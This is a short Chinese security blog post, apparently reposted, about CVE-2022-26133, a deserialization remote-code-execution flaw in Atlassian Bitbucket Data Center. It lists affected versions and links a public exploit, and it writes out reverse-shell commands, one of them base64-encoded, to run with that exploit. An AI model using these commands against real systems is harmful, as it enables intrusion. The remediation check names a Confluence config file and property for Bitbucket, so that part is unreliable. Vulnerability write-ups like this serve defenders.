CVE-2022-26133

admin 2025年1月13日10:29:19评论14 views字数 1296阅读4分19秒阅读模式

Atlassian Bitbucket Data Center 远程代码执行漏洞 CVE-2022-26133

此文章仅供用于学习研究,严禁用于非法用途,否则后果自负。

组件名称

Atlassian Bitbucket Data Center

组件介绍

Atlassian Bitbucket Data Center 是 Atlassian 的 Git 存储库管理解决方案,其为需要高可用性和大规模性能的企业提供源代码协作。

漏洞简介

该漏洞是由于 Atlassian Bitbucket Data Center 中的 Hazelcast 接口功能未对用户数据进行有效过滤,导致存在反序列化漏洞而引起的。攻击者利用该漏洞可以构造恶意数据远程执行任意代码。只有当 Atlassian Bitbucket Data Center 以 Cluster 模式安装时,才可能受该漏洞影响。

漏洞影响

Atlassian Bitbucket Data Center 是 Atlassian 推出的一款现代化代码协作平台,支持代码审查、分支权限管理、CICD 等功能。如果 Bitbucket Data Center 以 Cluster 模式安装则可能受该漏洞影响。

目前受影响的 Atlassian Bitbucket Data Center 版本:

Atlassian Bitbucket Data Center >= 5.14.x

Atlassian Bitbucket Data Center 6.x

Atlassian Bitbucket Data Center < 7.6.14

Atlassian Bitbucket Data Center < 7.16.x

Atlassian Bitbucket Data Center < 7.17.6

Atlassian Bitbucket Data Center < 7.18.4

Atlassian Bitbucket Data Center < 7.19.4

Atlassian Bitbucket Data Center 7.20.0

漏洞利用

https://github.com/Pear1y/CVE-2022-26133

Hazelcast默认情况下开启端口 5701

漏洞检测

 python CVE-2022-26133.py -u url --verify

反弹shell

 python CVE-2022-26133.py -u url -c "bash -c {echo,LGJhc2ggLWkgPiYgL2Rldi90Y3AvaXAvODA4MCAwPiYx}|{base64,-d}|{bash,-i}"
 
 python CVE-2022-26133.py -u url -c "bash -i >& /dev/tcp/ip/8080 0>&1"

漏洞修复

更新升级到安全版本

用户可以通过以下方式自查 Bitbucket Data Center 是否是以 Cluster 模式安装的。打开 Bitbucket Data Center 的安装目录下的 confluence.cfg.xml 文件,若包含以下内容,则表明是以 Cluster 模式安装的。

 <property name="confluence.cluster">true</property>

原文始发于微信公众号(漏洞挖掘之路):CVE-2022-26133

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月13日10:29:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2022-26133https://cn-sec.com/archives/1104134.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息